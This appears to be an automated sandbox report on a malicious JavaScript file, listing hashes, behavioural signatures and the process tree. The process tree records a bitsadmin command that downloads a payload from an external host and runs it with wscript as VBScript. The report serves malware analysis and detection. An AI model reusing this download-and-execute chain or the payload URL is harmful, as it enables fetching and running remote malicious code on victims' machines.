Analysis
-
max time kernel
135s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system -
submitted
29-08-2024 01:47
Static task
static1
Behavioral task
behavioral1
Sample
8ed7810c7c48d274f4b845cb155ab61af9ac0297fceb2f356ad5557434977b5a.js
Resource
win7-20240708-en
General
-
Target
8ed7810c7c48d274f4b845cb155ab61af9ac0297fceb2f356ad5557434977b5a.js
-
Size
441KB
-
MD5
c7e47553b94c0d18ecf9e03b5ffec68b
-
SHA1
bfb60db9ad9e0bd41ee2335acaa6316264c0b638
-
SHA256
8ed7810c7c48d274f4b845cb155ab61af9ac0297fceb2f356ad5557434977b5a
-
SHA512
5a624285b1d9179939495c0f2baa4ecfb7cc9561098977be825ab83b6c90d5e86b4571f5cfa603d9e5e2be76b8e84153a607f26b4263cbff908bb5aca2201194
-
SSDEEP
384:JeeeeeeeeeeeRReeeeeeeeeeeReeeeeeeeeeezeeeeeeeeeee8eeeeeeeeeeeRe4:Heo
Malware Config
Signatures
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exe
description: Key value queried
ioc: \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation
process: wscript.exe
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
wscript.exe
description: PID 4288 wrote to memory of 1776; pid: 4288; process: wscript.exe; target process: bitsadmin.exe
description: PID 4288 wrote to memory of 1776; pid: 4288; process: wscript.exe; target process: bitsadmin.exe
description: PID 4288 wrote to memory of 4408; pid: 4288; process: wscript.exe; target process: wscript.exe
description: PID 4288 wrote to memory of 4408; pid: 4288; process: wscript.exe; target process: wscript.exe
Processes
-
C:\Windows\system32\wscript.exe
Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\8ed7810c7c48d274f4b845cb155ab61af9ac0297fceb2f356ad5557434977b5a.js
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4288 -
C:\Windows\System32\bitsadmin.exe
Command line: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/mes/010111100110101101001111111101011011100101011110 C:\Users\Admin\AppData\Local\Temp\pmqfgkdqzsbsvsamfrryrizflqdvvwqqctmqvepuyuplixbkjbforifcqtpxeylsnfsloatiuqykwi
- Download via BitsAdmin
PID:1776 -
C:\Windows\System32\wscript.exe
Command line: "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\Admin\AppData\Local\Temp\pmqfgkdqzsbsvsamfrryrizflqdvvwqqctmqvepuyuplixbkjbforifcqtpxeylsnfsloatiuqykwi
PID:4408